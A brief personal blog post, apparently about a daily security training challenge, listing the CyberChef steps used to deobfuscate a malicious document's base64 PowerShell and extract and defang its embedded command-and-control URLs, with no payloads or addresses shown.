07 Dec 2022
CyberChef Maldocs roasting on an open fireHad to skip yesterday’s challenge and post, so they’re doubled today. I kept a simple question in the wings to keep the streak alive though. Glad for this one because I’m always looking for a fun reason to use CyberChef.
New acronym, C2 - Command and Control Infrastructure. Really digging the new(ish) wiki-type links in the tasks.
Extract strings - step 1 after loading, look for embedded domains. Set to all printable characters and tweak minimum size of string until information to focus on is shown.
Find/Replace - Use to remove extra repeated characters used for obfuscation. Reveals, among other things, base64 coding.
Drop Bytes - start at 0 and increase length until left with only base64.
From Base64 - decode from standard powershell UTF-16LE (1200)
Find/Replace - remove repeated characters again
Find/Replace - replace simple string of obfuscated addresses
Extract URLs - leave only URLs
Split - split results at repeated delimiter
Defang URL - make resulting links readable but unclickable
Gather information from last task’s attached file.
All flags captured. I really like the focus on documentation and prepping things for documentation to hand on to the next team this year. Having had to dig through poor and lacks of documentation this is a good sleight of hand to slip the training/expectation in to prevent poor documentation in the future.